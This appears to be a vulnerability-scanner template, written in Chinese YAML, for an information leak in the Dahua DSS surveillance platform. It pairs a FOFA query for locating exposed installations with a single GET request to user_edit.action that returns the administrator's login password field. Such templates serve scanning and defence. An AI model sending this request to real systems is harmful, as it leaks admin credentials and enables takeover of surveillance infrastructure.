product: 大华DSS城市安防监控平台
vName: 大华DSS城市安防监控平台 user_edit.action信息泄漏
type: 信息泄漏
vID: [ ]
level: 2
vDesc: 大华DSS城市安防监控平台是一个在通用安防视频监控系统基础上设计开发的系统。该平台user_edit.action泄露了敏感信息漏洞，攻击者可以通过此漏洞获取管理员对应权限。
version: ''
note: ''
search:
  FOFA: app="dahua-DSS"
protocol: http
link: https://blog.csdn.net/qq_67810151/article/details/137279760
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /admin/cascade_/user_edit.action?id=1
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - rightinput
              - userBean.loginPass
            logic: and
